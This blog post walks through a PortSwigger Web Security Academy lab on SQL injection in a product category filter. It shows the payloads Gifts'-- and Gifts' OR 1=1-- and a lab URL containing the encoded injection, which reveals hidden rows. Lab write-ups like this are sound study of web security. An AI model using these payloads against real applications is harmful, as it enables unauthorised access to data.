Port Swigger Lab-SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

br4ind3ad
2 min readDec 24, 2021
source — unsplash@Raghavendra V. Konkathi

Retrieving hidden data

Lab Description : This lab contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

Steps:

  1. Access the lab and explore the web application

2. In categories, let's click on Gifts

3. In this Category you can see that there are 3 products ONLY.

SQL query to retrieve these 3 products will be:

SELECT * FROM products WHERE category = ‘Gift’ AND released = 1

The restriction released = 1 is being used to hide products that are not released. For unreleased products, presumably released = 0.

4. To bypass this let's end the query early by adding a double dash which comments out the rest of the query

The query now becomes:

SELECT * FROM products WHERE category = ‘Gift’--' AND released = 1

The bold is the query that will be executed.

Here, all products are displayed, including unreleased products in this category.

5. Going further, we can cause the application to display all the products in any category, including categories that we don’t know about by using Gift ‘ OR 1=1--

https://ac5d1f8c1f19b592c0f507aa005e00af.web-security-academy.net/filter?category=Gifts%27%20OR%201=1--

This results in the SQL query:

SELECT * FROM products WHERE category = ‘Gifts’ OR 1=1 — ‘ AND released = 1

The modified query will return all items where either the category is Gifts, or 1 is equal to 1. Since 1=1 is always true, the query will return all items.

Thanks for Reading!

--

--